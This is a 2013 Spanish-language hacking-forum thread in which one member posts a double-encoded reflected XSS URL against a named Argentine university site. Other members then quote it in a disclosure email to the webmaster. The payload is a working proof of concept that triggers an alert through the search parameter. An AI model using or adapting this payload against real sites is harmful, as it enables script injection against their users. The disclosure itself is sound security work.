Sólo texto | Texto con Imágenes

Underc0de

[In]Seguridad Informática => Bugs y Exploits => Hacking ShowOff => Mensaje iniciado por: Muppet en Febrero 19, 2013, 06:12:52 PM

Título: XSS Double Encode UTN Bs As
Publicado por: Muppet en Febrero 19, 2013, 06:12:52 PM
(http://i50.tinypic.com/28ltnch.png)

XSS Double Encode

Web: http://www.sceu.frba.utn.edu.ar/
Vector: http://www.sceu.frba.utn.edu.ar/e-learning/component/search/?searchword=%2522%253E%253Cimg%2520src%3D.%2520onerror%3Dalert%28/HD_Breaker/%29%253E%253C!--
Reportado: No
Título: Re:XSS Double Encode UTN Bs As
Publicado por: ANTRAX en Febrero 19, 2013, 07:05:09 PM
Reportado!

CitarEstimado webmaster,
Pertenezco a un grupo llamado Underc0de Research Security, y nos dedicamos a encontrar fallas de seguridad, reportarlas y brindamos soporte para ayudar a solucionarlas.
El dia de hoy, el usuario HD_Breaker notifico una falla en el sitio: sceu.frba.utn.edu.ar se trata de un XSS. El vector para reproducirlo es el siguiente:

http://www.sceu.frba.utn.edu.ar/e-learning/component/search/?searchword=%2522%253E%253Cimg%2520src%3D.%2520onerror%3Dalert%28/HD_Breaker/%29%253E%253C!--

Espero que puedan arreglarlo antes de que alguien le saque provecho.

Saludos Cordiales
Underc0de Research Security

Saludos!
Título: Re:XSS Double Encode UTN Bs As
Publicado por: Expermicid en Febrero 19, 2013, 10:10:52 PM
Buenisimo y Antrax no me pudo haber ayudado mejor con su comentario :)

Saludos
Sólo texto | Texto con Imágenes